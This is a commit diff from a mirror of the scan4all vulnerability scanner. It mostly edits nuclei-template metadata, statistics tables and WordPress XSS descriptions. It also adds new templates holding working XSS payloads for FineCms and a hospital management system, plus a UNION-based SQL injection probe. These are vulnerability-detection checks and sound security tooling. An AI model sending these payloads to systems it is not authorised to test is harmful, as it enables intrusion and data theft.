Projects STRLCPY scan4all Commits e2ac6102
🤬
  • ■ ■ ■ ■
    config/config.json
    skipped 65 lines
    66 66   "KsubdomainRegxp": "([0-9a-zA-Z\\-]+\\.[0-9a-zA-Z\\-]+)$",
    67 67   "naabu_dns": {},
    68 68   "naabu": {"TopPorts": "1000","ScanAllIPS": true,"Threads": 50,"EnableProgressBar": false},
    69  - "priorityNmap": false,
     69 + "priorityNmap": true,
    70 70   "noScan": false,
    71 71   "enableMultNuclei": false,
    72 72   "enableNuclei": true,
    skipped 39 lines
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/README.md
    skipped 41 lines
    42 42   
    43 43  | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
    44 44  |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
    45  -| cve | 1363 | daffainfo | 629 | cves | 1336 | info | 1433 | http | 3740 |
    46  -| panel | 627 | dhiyaneshdk | 551 | exposed-panels | 635 | high | 971 | file | 76 |
    47  -| lfi | 497 | pikpikcu | 325 | vulnerabilities | 524 | medium | 804 | network | 51 |
    48  -| xss | 467 | pdteam | 269 | technologies | 276 | critical | 462 | dns | 17 |
    49  -| wordpress | 417 | geeknik | 187 | exposures | 272 | low | 220 | | |
    50  -| exposure | 389 | dwisiswant0 | 169 | token-spray | 230 | unknown | 7 | | |
    51  -| cve2021 | 340 | 0x_akoko | 158 | misconfiguration | 215 | | | | |
    52  -| rce | 333 | princechaddha | 150 | workflows | 187 | | | | |
    53  -| wp-plugin | 312 | pussycat0x | 133 | default-logins | 102 | | | | |
    54  -| tech | 288 | gy741 | 126 | file | 76 | | | | |
     45 +| cve | 1388 | daffainfo | 630 | cves | 1363 | info | 1450 | http | 3773 |
     46 +| panel | 642 | dhiyaneshdk | 558 | exposed-panels | 649 | high | 974 | file | 76 |
     47 +| edb | 548 | pikpikcu | 326 | vulnerabilities | 510 | medium | 811 | network | 51 |
     48 +| lfi | 496 | pdteam | 269 | technologies | 278 | critical | 469 | dns | 17 |
     49 +| xss | 472 | geeknik | 187 | exposures | 273 | low | 219 | | |
     50 +| wordpress | 415 | dwisiswant0 | 169 | token-spray | 230 | unknown | 7 | | |
     51 +| exposure | 394 | 0x_akoko | 158 | misconfiguration | 217 | | | | |
     52 +| cve2021 | 343 | princechaddha | 150 | workflows | 189 | | | | |
     53 +| rce | 335 | pussycat0x | 133 | default-logins | 102 | | | | |
     54 +| wp-plugin | 312 | ritikchaddha | 130 | file | 76 | | | | |
    55 55   
    56  -**293 directories, 4110 files**.
     56 +**294 directories, 4145 files**.
    57 57   
    58 58  </td>
    59 59  </tr>
    skipped 38 lines
  • config/nuclei-templates/TEMPLATES-STATS.json
    Unable to diff as some line is too long.
  • config/nuclei-templates/TEMPLATES-STATS.md
    Diff is too large to be displayed.
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/TOP-10.md
    1 1  | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
    2 2  |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
    3  -| cve | 1363 | daffainfo | 629 | cves | 1336 | info | 1433 | http | 3740 |
    4  -| panel | 627 | dhiyaneshdk | 551 | exposed-panels | 635 | high | 971 | file | 76 |
    5  -| lfi | 497 | pikpikcu | 325 | vulnerabilities | 524 | medium | 804 | network | 51 |
    6  -| xss | 467 | pdteam | 269 | technologies | 276 | critical | 462 | dns | 17 |
    7  -| wordpress | 417 | geeknik | 187 | exposures | 272 | low | 220 | | |
    8  -| exposure | 389 | dwisiswant0 | 169 | token-spray | 230 | unknown | 7 | | |
    9  -| cve2021 | 340 | 0x_akoko | 158 | misconfiguration | 215 | | | | |
    10  -| rce | 333 | princechaddha | 150 | workflows | 187 | | | | |
    11  -| wp-plugin | 312 | pussycat0x | 133 | default-logins | 102 | | | | |
    12  -| tech | 288 | gy741 | 126 | file | 76 | | | | |
     3 +| cve | 1388 | daffainfo | 630 | cves | 1363 | info | 1450 | http | 3773 |
     4 +| panel | 642 | dhiyaneshdk | 558 | exposed-panels | 649 | high | 974 | file | 76 |
     5 +| edb | 548 | pikpikcu | 326 | vulnerabilities | 510 | medium | 811 | network | 51 |
     6 +| lfi | 496 | pdteam | 269 | technologies | 278 | critical | 469 | dns | 17 |
     7 +| xss | 472 | geeknik | 187 | exposures | 273 | low | 219 | | |
     8 +| wordpress | 415 | dwisiswant0 | 169 | token-spray | 230 | unknown | 7 | | |
     9 +| exposure | 394 | 0x_akoko | 158 | misconfiguration | 217 | | | | |
     10 +| cve2021 | 343 | princechaddha | 150 | workflows | 189 | | | | |
     11 +| rce | 335 | pussycat0x | 133 | default-logins | 102 | | | | |
     12 +| wp-plugin | 312 | ritikchaddha | 130 | file | 76 | | | | |
    13 13   
  • ■ ■ ■ ■
    config/nuclei-templates/cnvd/2020/CNVD-2020-23735.yaml
    skipped 2 lines
    3 3  info:
    4 4   name: Xxunchi CMS - Local File Inclusion
    5 5   author: princechaddha
    6  - severity: medium
     6 + severity: high
    7 7   description: Xunyou CMS is vulnerable to local file inclusion. Attackers can use vulnerabilities to obtain sensitive information.
    8 8   reference:
    9 9   - https://www.cnvd.org.cn/flaw/show/2025171
    skipped 26 lines
  • ■ ■ ■ ■
    config/nuclei-templates/cnvd/2021/CNVD-2021-30167.yaml
    skipped 2 lines
    3 3  info:
    4 4   name: UFIDA NC BeanShell Remote Command Execution
    5 5   author: pikpikcu
    6  - severity: high
     6 + severity: critical
    7 7   description: UFIDA NC BeanShell contains a remote command execution vulnerability in the bsh.servlet.BshServlet program.
    8 8   reference:
    9 9   - https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A
    skipped 42 lines
  • ■ ■ ■ ■
    config/nuclei-templates/cves/2014/CVE-2014-8682.yaml
    skipped 2 lines
    3 3  info:
    4 4   name: Gogs (Go Git Service) - SQL Injection
    5 5   author: dhiyaneshDK,daffainfo
    6  - severity: high
     6 + severity: critical
    7 7   description: Multiple SQL injection vulnerabilities in Gogs (aka Go Git Service) 0.3.1-9 through 0.5.x before 0.5.6.1105 Beta allow remote attackers to execute arbitrary SQL commands via the q parameter to (1) api/v1/repos/search, which is not properly handled in models/repo.go, or (2) api/v1/users/search, which is not properly handled in models/user.go.
    8 8   reference:
    9 9   - https://nvd.nist.gov/vuln/detail/CVE-2014-8682
    skipped 35 lines
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2017/CVE-2017-11629.yaml
     1 +id: CVE-2017-11629
     2 + 
     3 +info:
     4 + name: FineCms 5.0.10 - Cross Site Scripting
     5 + author: ritikchaddha
     6 + severity: medium
     7 + description: |
     8 + dayrui FineCms through 5.0.10 has Cross Site Scripting (XSS) in controllers/api.php via the function parameter in a c=api&m=data2 request.
     9 + reference:
     10 + - http://lorexxar.cn/2017/07/20/FineCMS%20multi%20vulnerablity%20before%20v5.0.9/#URL-Redirector-Abuse
     11 + - https://nvd.nist.gov/vuln/detail/CVE-2017-11629/
     12 + classification:
     13 + cve-id: CVE-2017-11629
     14 + metadata:
     15 + verified: true
     16 + tags: cve,cve2017,xss,finecms
     17 + 
     18 +requests:
     19 + - method: GET
     20 + path:
     21 + - "{{BaseURL}}/index.php?c=api&m=data2&function=%3Cscript%3Ealert(document.domain)%3C/script%3Ep&format=php"
     22 + 
     23 + matchers-condition: and
     24 + matchers:
     25 + - type: word
     26 + part: body
     27 + words:
     28 + - '<script>alert(document.domain)</script>p不存在'
     29 + 
     30 + - type: word
     31 + part: header
     32 + words:
     33 + - text/html
     34 + 
     35 + - type: status
     36 + status:
     37 + - 200
     38 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2020/CVE-2020-5191.yaml
     1 +id: CVE-2020-5191
     2 + 
     3 +info:
     4 + name: Hospital Management System 4.0 - Cross-Site Scripting
     5 + author: TenBird
     6 + severity: medium
     7 + description: |
     8 + PHPGurukul Hospital Management System in PHP v4.0 suffers from multiple Persistent XSS vulnerabilities.
     9 + reference:
     10 + - https://www.exploit-db.com/exploits/47841
     11 + - https://nvd.nist.gov/vuln/detail/CVE-2020-5191
     12 + - https://phpgurukul.com/hospital-management-system-in-php/
     13 + classification:
     14 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     15 + cvss-score: 6.1
     16 + cve-id: CVE-2020-5191
     17 + cwe-id: CWE-79
     18 + metadata:
     19 + verified: "true"
     20 + tags: cve2020,hms,cms,xss,authenticated,edb,cve
     21 + 
     22 +requests:
     23 + - raw:
     24 + - |
     25 + POST /hospital/hms/admin/index.php HTTP/1.1
     26 + Host: {{Hostname}}
     27 + Content-Type: application/x-www-form-urlencoded
     28 + 
     29 + username={{username}}&password={{password}}&submit=&submit=
     30 + 
     31 + - |
     32 + POST /hospital/hms/admin/doctor-specilization.php HTTP/1.1
     33 + Host: {{Hostname}}
     34 + Content-Type: application/x-www-form-urlencoded
     35 + 
     36 + doctorspecilization=%3C%2Ftd%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3Ctd%3E&submit=
     37 + 
     38 + redirects: true
     39 + max-redirects: 2
     40 + cookie-reuse: true
     41 + matchers-condition: and
     42 + matchers:
     43 + - type: word
     44 + part: body
     45 + words:
     46 + - '<td class="hidden-xs"></td><script>alert(document.domain);</script><td>'
     47 + 
     48 + - type: word
     49 + part: header
     50 + words:
     51 + - text/html
     52 + 
     53 + - type: status
     54 + status:
     55 + - 200
     56 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2020/CVE-2020-5192.yaml
     1 +id: CVE-2020-5192
     2 + 
     3 +info:
     4 + name: Hospital Management System 4.0 - SQL Injection
     5 + author: TenBird
     6 + severity: high
     7 + description: |
     8 + PHPGurukul Hospital Management System in PHP v4.0 suffers from multiple SQL injection vulnerabilities: multiple pages and parameters are not validating user input, and allow for the application's database and information to be fully compromised.
     9 + reference:
     10 + - https://www.exploit-db.com/exploits/47840
     11 + - https://nvd.nist.gov/vuln/detail/CVE-2020-5192
     12 + - https://phpgurukul.com/hospital-management-system-in-php/
     13 + classification:
     14 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
     15 + cvss-score: 8.8
     16 + cve-id: CVE-2020-5192
     17 + cwe-id: CWE-89
     18 + metadata:
     19 + verified: "true"
     20 + tags: cve2020,hms,cms,sqli,authenticated,edb,cve
     21 + 
     22 +variables:
     23 + num: "999999999"
     24 + 
     25 +requests:
     26 + - raw:
     27 + - |
     28 + POST /hospital/hms/doctor/index.php HTTP/1.1
     29 + Host: {{Hostname}}
     30 + Content-Type: application/x-www-form-urlencoded
     31 + 
     32 + username={{username}}password={{password}}&submit=&submit=
     33 + 
     34 + - |
     35 + POST /hospital/hms/doctor/search.php HTTP/1.1
     36 + Host: {{Hostname}}
     37 + Content-Type: application/x-www-form-urlencoded
     38 + 
     39 + searchdata='+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT(md5({{num}}),1),2),NULL--+PqeG&search=
     40 + 
     41 + redirects: true
     42 + max-redirects: 2
     43 + cookie-reuse: true
     44 + matchers-condition: and
     45 + matchers:
     46 + - type: word
     47 + part: body
     48 + words:
     49 + - '{{md5(num)}}'
     50 + 
     51 + - type: status
     52 + status:
     53 + - 200
     54 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-24300.yaml
    1 1  id: CVE-2021-24300
    2 2   
    3 3  info:
    4  - name: PickPlugins Product Slider for WooCommerce < 1.13.22 - XSS
     4 + name: WordPress WooCommerce <1.13.22 - Cross-Site Scripting
    5 5   author: cckuailong
    6 6   severity: medium
    7  - description: The slider import search feature of the PickPlugins Product Slider for WooCommerce WordPress plugin before 1.13.22 did not properly sanitised the keyword GET parameter, leading to reflected Cross-Site Scripting issue.
     7 + description: WordPress WooCommerce before 1.13.22 contains a reflected cross-site scripting vulnerability via the slider import search feature because it does not properly sanitize the keyword GET parameter.
    8 8   reference:
    9 9   - https://wpscan.com/vulnerability/5fbbc7ad-3f1a-48a1-b2eb-e57f153eb837
    10 10   - https://nvd.nist.gov/vuln/detail/CVE-2021-24300
    skipped 37 lines
    48 48   status:
    49 49   - 200
    50 50   
     51 +# Enhanced by mp on 2022/08/28
     52 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-24316.yaml
    1 1  id: CVE-2021-24316
    2 2   
    3 3  info:
    4  - name: An Unauthenticated Reflected XSS & XFS Mediumish theme through 1.0.47 for WordPress
     4 + name: WordPress Mediumish Theme <=1.0.47 - Cross-Site Scripting
    5 5   author: 0x_Akoko
    6 6   severity: medium
    7  - description: Mediumish WordPress Theme <= 1.0.47 - Unauthenticated Reflected XSS & XFS.
     7 + description: WordPress Mediumish theme 1.0.47 and prior contains an unauthenticated reflected cross-site scripting vulnerability. The 's' GET parameter is not properly sanitized by the search feature before it is output back on the page.
    8 8   reference:
    9 9   - https://wpscan.com/vulnerability/57e27de4-58f5-46aa-9b59-809705733b2e
    10 10   - https://m0ze.ru/vulnerability/%5B2021-03-14%5D-%5BWordPress%5D-%5BCWE-79%5D-Mediumish-WordPress-Theme-v1.0.47.txt
    11 11   - https://www.wowthemes.net/themes/mediumish-wordpress/
     12 + - https://nvd.nist.gov/vuln/detail/CVE-2021-24316
    12 13   classification:
    13 14   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    14 15   cvss-score: 6.1
    skipped 24 lines
    39 40   - "text/html"
    40 41   part: header
    41 42   
     43 +# Enhanced by mp on 2022/08/28
     44 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-24320.yaml
    1 1  id: CVE-2021-24320
    2 2   
    3 3  info:
    4  - name: Bello WordPress Theme < 1.6.0 - Reflected Cross-Site Scripting (XSS)
     4 + name: WordPress Bello Directory & Listing Theme <1.6.0 - Cross-Site Scripting
    5 5   author: daffainfo
    6 6   severity: medium
    7  - description: The Bello - Directory & Listing WordPress theme before 1.6.0 did not properly sanitise and escape its listing_list_view, bt_bb_listing_field_my_lat, bt_bb_listing_field_my_lng, bt_bb_listing_field_distance_value,
    8  - bt_bb_listing_field_my_lat_default, bt_bb_listing_field_keyword, bt_bb_listing_field_location_autocomplete, bt_bb_listing_field_price_range_from and bt_bb_listing_field_price_range_to parameter in ints listing
    9  - page, leading to reflected Cross-Site Scripting issues.
     7 + description: WordPress Bello Directory & Listing theme before 1.6.0 contains a reflected cross-site scripting vulnerability. It does not properly sanitize and escape the listing_list_view, bt_bb_listing_field_my_lat, bt_bb_listing_field_my_lng, bt_bb_listing_field_distance_value,
     8 + bt_bb_listing_field_my_lat_default, bt_bb_listing_field_keyword, bt_bb_listing_field_location_autocomplete, bt_bb_listing_field_price_range_from and bt_bb_listing_field_price_range_to parameters in the ints listing
     9 + page.
    10 10   reference:
    11 11   - https://m0ze.ru/vulnerability/%5B2021-03-21%5D-%5BWordPress%5D-%5BCWE-79%5D-Bello-WordPress-Theme-v1.5.9.txt
    12 12   - https://wpscan.com/vulnerability/6b5b42fd-028a-4405-b027-3266058029bb
     13 + - https://nvd.nist.gov/vuln/detail/CVE-2021-24320
    13 14   classification:
    14 15   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    15 16   cvss-score: 6.1
    skipped 22 lines
    38 39   status:
    39 40   - 200
    40 41   
     42 +# Enhanced by mp on 2022/08/28
     43 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-24335.yaml
    1 1  id: CVE-2021-24335
    2 2   
    3 3  info:
    4  - name: Car Repair Services < 4.0 - Reflected Cross-Site Scripting (XSS)
     4 + name: WordPress Car Repair Services & Auto Mechanic Theme <4.0 - Cross-Site Scripting
    5 5   author: daffainfo
    6 6   severity: medium
    7  - description: The Car Repair Services & Auto Mechanic WordPress theme before 4.0 did not properly sanitise its serviceestimatekey search parameter before outputting it back in the page, leading to a reflected Cross-Site Scripting issue
     7 + description: WordPress Car Repair Services & Auto Mechanic before 4.0 contains a reflected cross-site scripting vulnerability. It does not properly sanitize the serviceestimatekey parameter before outputting it back in the page.
    8 8   reference:
    9  - - https://nvd.nist.gov/vuln/detail/CVE-2021-24335
    10 9   - https://themeforest.net/item/car-repair-services-auto-mechanic-wordpress-theme/19823557
    11 10   - https://m0ze.ru/vulnerability/[2021-02-12]-[WordPress]-[CWE-79]-Car-Repair-Services-WordPress-Theme-v3.9.txt
    12 11   - https://wpscan.com/vulnerability/39258aba-2449-4214-a490-b8e46945117d
     12 + - https://nvd.nist.gov/vuln/detail/CVE-2021-24335
    13 13   classification:
    14 14   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    15 15   cvss-score: 6.1
    skipped 22 lines
    38 38   status:
    39 39   - 200
    40 40   
     41 +# Enhanced by mp on 2022/08/28
     42 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-24342.yaml
    1 1  id: CVE-2021-24342
    2 2   
    3 3  info:
    4  - name: JNews < 8.0.6 - Reflected Cross-Site Scripting (XSS)
     4 + name: WordPress JNews Theme <8.0.6 - Cross-Site Scripting
    5 5   author: pikpikcu
    6 6   severity: medium
    7  - description: JNews WordPress theme before 8.0.6 did not sanitise the cat_id parameter in the POST request /?ajax-request=jnews (with action=jnews_build_mega_category_*), leading to a Reflected Cross-Site Scripting (XSS) issue.
     7 + description: WordPress JNews theme before 8.0.6 contains a reflected cross-site scripting vulnerability. It does not sanitize the cat_id parameter in the POST request /?ajax-request=jnews (with action=jnews_build_mega_category_*).
    8 8   reference:
    9 9   - https://wpscan.com/vulnerability/415ca763-fe65-48cb-acd3-b375a400217e
    10 10   - https://nvd.nist.gov/vuln/detail/CVE-2021-24342
    skipped 31 lines
    42 42   status:
    43 43   - 200
    44 44   
     45 +# Enhanced by mp on 2022/08/28
     46 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-24364.yaml
    1 1  id: CVE-2021-24364
    2 2   
    3 3  info:
    4  - name: Jannah < 5.4.4 (XSS)
     4 + name: WordPress Jannah Theme <5.4.4 - Cross-Site Scripting
    5 5   author: pikpikcu
    6 6   severity: medium
    7  - description: The Jannah WordPress theme before 5.4.4 did not properly sanitize the options JSON parameter in its tie_get_user_weather AJAX action before outputting it back in the page, leading to a Reflected Cross-Site
    8  - Scripting (XSS) vulnerability.
     7 + description: WordPress Jannah theme before 5.4.4 contains a reflected cross-site scripting vulnerability. It does not properly sanitize the options JSON parameter in its tie_get_user_weather AJAX action before outputting it back in the page.
    9 8   reference:
    10 9   - https://wpscan.com/vulnerability/1d53fbe5-a879-42ca-a9d3-768a80018382
    11 10   - https://nvd.nist.gov/vuln/detail/CVE-2021-24364
    skipped 26 lines
    38 37   status:
    39 38   - 200
    40 39   
     40 +# Enhanced by mp on 2022/08/28
     41 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-24387.yaml
    1 1  id: CVE-2021-24387
    2 2   
    3 3  info:
    4  - name: Real Estate 7 WordPress Theme < 3.1.1 - Unauthenticated Reflected XSS
     4 + name: WordPress Pro Real Estate 7 Theme <3.1.1 - Cross-Site Scripting
    5 5   author: suman_kar
    6 6   severity: medium
    7 7   description: |
    8  - The WP Pro Real Estate 7 WordPress theme before 3.1.1 did not properly sanitise the ct_community parameter
    9  - in its search listing page before outputting it back in it, leading to a reflected Cross-Site Scripting which
    10  - can be triggered in both unauthenticated or authenticated user context
     8 + WordPress Pro Real Estate 7 theme before 3.1.1 contains a reflected cross-site scripting vulnerability. It does not properly sanitize the ct_community parameter in its search listing page before outputting it back.
    11 9   reference:
    12 10   - https://cxsecurity.com/issue/WLB-2021070041
    13 11   - https://wpscan.com/vulnerability/27264f30-71d5-4d2b-8f36-4009a2be6745
    14 12   - https://contempothemes.com/wp-real-estate-7/changelog/
     13 + - https://nvd.nist.gov/vuln/detail/CVE-2021-24387
    15 14   classification:
    16 15   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    17 16   cvss-score: 6.1
    skipped 23 lines
    41 40   status:
    42 41   - 200
    43 42   
     43 +# Enhanced by mp on 2022/08/28
     44 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-24389.yaml
    1 1  id: CVE-2021-24389
    2 2   
    3 3  info:
    4  - name: FoodBakery < 2.2 - Reflected Cross-Site Scripting (XSS)
     4 + name: WordPress FoodBakery <2.2 - Cross-Site Scripting
    5 5   author: daffainfo
    6 6   severity: medium
    7  - description: The WP Foodbakery WordPress plugin before 2.2, used in the FoodBakery WordPress theme before 2.2 did not properly sanitize the foodbakery_radius parameter before outputting it back in the response, leading to an unauthenticated Reflected Cross-Site Scripting (XSS) vulnerability.
     7 + description: WordPress FoodBakery before 2.2 contains an unauthenticated reflected cross-site scripting vulnerability. It does not properly sanitize the foodbakery_radius parameter before outputting it back in the response.
    8 8   reference:
     9 + - https://wpscan.com/vulnerability/23b8b8c4-cded-4887-a021-5f3ea610213b
    9 10   - https://nvd.nist.gov/vuln/detail/CVE-2021-24389
    10  - - https://wpscan.com/vulnerability/23b8b8c4-cded-4887-a021-5f3ea610213b
    11 11   classification:
    12 12   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    13 13   cvss-score: 6.1
    skipped 22 lines
    36 36   status:
    37 37   - 200
    38 38   
     39 +# Enhanced by mp on 2022/08/28
     40 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-24407.yaml
    1 1  id: CVE-2021-24407
    2 2   
    3 3  info:
    4  - name: Jannah < 5.4.5 - Reflected Cross-Site Scripting (XSS)
     4 + name: WordPress Jannah Theme <5.4.5 - Cross-Site Scripting
    5 5   author: pikpikcu
    6 6   severity: medium
    7  - description: The Jannah WordPress theme before 5.4.5 did not properly sanitize the 'query' POST parameter in its tie_ajax_search AJAX action, leading to a Reflected Cross-site Scripting (XSS) vulnerability.
     7 + description: WordPress Jannah theme before 5.4.5 contains a reflected cross-site scripting vulnerability. It does not properly sanitize the 'query' POST parameter in its tie_ajax_search AJAX action.
    8 8   reference:
    9 9   - https://wpscan.com/vulnerability/fba9f010-1202-4eea-a6f5-78865c084153
    10 10   - https://nvd.nist.gov/vuln/detail/CVE-2021-24407
    skipped 31 lines
    42 42   status:
    43 43   - 200
    44 44   
     45 +# Enhanced by mp on 2022/08/28
     46 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-24488.yaml
    1 1  id: CVE-2021-24488
    2 2   
    3 3  info:
    4  - name: WordPress Plugin Post Grid < 2.1.8 - XSS
     4 + name: WordPress Post Grid <2.1.8 - Cross-Site Scripting
    5 5   author: cckuailong
    6 6   severity: medium
    7  - description: The slider import search feature and tab parameter of the Post Grid WordPress plugin before 2.1.8 settings are not properly sanitised before being output back in the pages, leading to Reflected Cross-Site Scripting issues
     7 + description: WordPress Post Grid plugin before 2.1.8 contains a reflected cross-site scripting vulnerability. The slider import search feature and tab parameter of thesettings are not properly sanitized before being output back in the pages,
    8 8   reference:
    9 9   - https://wpscan.com/vulnerability/1fc0aace-ba85-4939-9007-d150960add4a
    10 10   - https://nvd.nist.gov/vuln/detail/CVE-2021-24488
    skipped 33 lines
    44 44   status:
    45 45   - 200
    46 46   
     47 +# Enhanced by mp on 2022/08/28
     48 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-24495.yaml
    1 1  id: CVE-2021-24495
    2 2   
    3 3  info:
    4  - name: Wordpress Plugin Marmoset Viewer XSS
     4 + name: Wordpress Marmoset Viewer <1.9.3 - Cross-Site Scripting
    5 5   author: johnjhacking
    6 6   severity: medium
    7  - description: The Marmoset Viewer WordPress plugin before 1.9.3 does not property sanitize, validate or escape the 'id' parameter before outputting back in the page, leading to a reflected Cross-Site Scripting issue.
     7 + description: WordPress Marmoset Viewer plugin before 1.9.3 contains a cross-site scripting vulnerability. It does not property sanitize, validate, or escape the 'id' parameter before outputting back in the page.
    8 8   reference:
    9 9   - https://johnjhacking.com/blog/cve-2021-24495-improper-neutralization-of-input-during-web-page-generation-on-id-parameter-in-wordpress-marmoset-viewer-plugin-versions-1.9.3-leads-to-reflected-cross-site-scripting/
    10 10   - https://wordpress.org/plugins/marmoset-viewer/#developers
    11 11   - https://wpscan.com/vulnerability/d11b79a3-f762-49ab-b7c8-3174624d7638
     12 + - https://nvd.nist.gov/vuln/detail/CVE-2021-24495
    12 13   classification:
    13 14   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    14 15   cvss-score: 6.1
    skipped 24 lines
    39 40   words:
    40 41   - "Marmoset Viewer"
    41 42   
     43 +# Enhanced by mp on 2022/08/28
     44 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-24498.yaml
    1 1  id: CVE-2021-24498
    2 2   
    3 3  info:
    4  - name: Calendar Event Multi View < 1.4.01 - Unauthenticated Reflected Cross-Site Scripting (XSS)
     4 + name: WordPress Calendar Event Multi View <1.4.01 - Cross-Site Scripting
    5 5   author: suman_kar
    6 6   severity: medium
    7  - description: The plugin does not sanitise or escape the 'start' and 'end' GET parameters before outputting them in the page (via php/edit.php), leading to a reflected Cross-Site Scripting issue.
     7 + description: WordPress Calendar Event Multi View plugin before 1.4.01 contains an unauthenticated reflected cross-site scripting vulnerability. It does not sanitize or escape the 'start' and 'end' GET parameters before outputting them in the page (via php/edit.php).
    8 8   reference:
    9 9   - https://wpscan.com/vulnerability/3c5a5187-42b3-4f88-9b0e-4fdfa1c39e86
     10 + - https://nvd.nist.gov/vuln/detail/CVE-2021-24498
    10 11   classification:
    11 12   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    12 13   cvss-score: 6.1
    skipped 28 lines
    41 42   status:
    42 43   - 200
    43 44   
     45 +# Enhanced by mp on 2022/08/28
     46 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-24510.yaml
    1 1  id: CVE-2021-24510
    2 2   
    3 3  info:
    4  - name: MF Gig Calendar <= 1.1 - Reflected Cross-Site Scripting (XSS)
     4 + name: WordPress MF Gig Calendar <=1.1 - Cross-Site Scripting
    5 5   author: dhiyaneshDK
    6 6   severity: medium
    7  - description: The MF Gig Calendar WordPress plugin through 1.1 does not sanitise or escape the id GET parameter before outputting back in the admin dashboard when editing an Event, leading to a reflected Cross-Site Scripting issue
     7 + description: WordPress MF Gig Calendar plugin 1.1 and prior contains a reflected cross-site scripting vulnerability. It does not sanitize or escape the id GET parameter before outputting back in the admin dashboard when editing an event.
    8 8   reference:
    9 9   - https://wpscan.com/vulnerability/715721b0-13a1-413a-864d-2380f38ecd39
    10 10   - https://nvd.nist.gov/vuln/detail/CVE-2021-24510
    skipped 36 lines
    47 47   words:
    48 48   - "text/html"
    49 49   
     50 +# Enhanced by mp on 2022/08/28
     51 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-24891.yaml
    1 1  id: CVE-2021-24891
    2 2   
    3 3  info:
    4  - name: Elementor < 3.1.4 - DOM Cross-Site-Scripting
     4 + name: WordPress Elementor Website Builder <3.1.4 - Cross-Site Scripting
    5 5   author: dhiyaneshDk
    6 6   severity: medium
    7 7   description: |
    8  - The Elementor Website Builder WordPress plugin before 3.1.4 does not sanitise or escape user input appended to the DOM via a malicious hash, resulting in a DOM Cross-Site Scripting issue.
     8 + WordPress Elementor Website Builder plugin before 3.1.4 contains a DOM cross-site scripting vulnerability. It does not sanitize or escape user input appended to the DOM via a malicious hash.
    9 9   reference:
    10 10   - https://www.jbelamor.com/xss-elementor-lightox.html
    11 11   - https://wpscan.com/vulnerability/fbed0daa-007d-4f91-8d87-4bca7781de2d
    skipped 34 lines
    46 46   - type: dsl
    47 47   dsl:
    48 48   - compare_versions(version, '> 1.5.0', '< 3.1.4') && status_code_1 == 200 && status_code_2 == 200
     49 + 
     50 +# Enhanced by mp on 2022/08/28
     51 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-24910.yaml
    1 1  id: CVE-2021-24910
    2 2   
    3 3  info:
    4  - name: Transposh WordPress < 1.0.7 - Reflected Cross-Site Scripting (XSS)
     4 + name: WordPress Transposh Translation <1.0.8 - Cross-Site Scripting
    5 5   author: Screamy
    6 6   severity: medium
    7  - description: |
    8  - The Transposh WordPress Translation WordPress plugin before 1.0.8 does not sanitise and escape the a parameter via an AJAX action (available to both unauthenticated and authenticated users when the curl library is installed) before outputting it back in the response, leading to a Reflected Cross-Site Scripting issue
     7 + description: WordPress Transposh Translation plugin before 1.0.8 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the a parameter via an AJAX action (available to both unauthenticated and authenticated users when the curl library is installed) before outputting it back in the response.
    9 8   reference:
    10 9   - https://www.rcesecurity.com/2022/07/WordPress-Transposh-Exploiting-a-Blind-SQL-Injection-via-XSS/
    11 10   - https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2021-24910.txt
    12 11   - https://wpscan.com/vulnerability/b5cbebf4-5749-41a0-8be3-3333853fca17
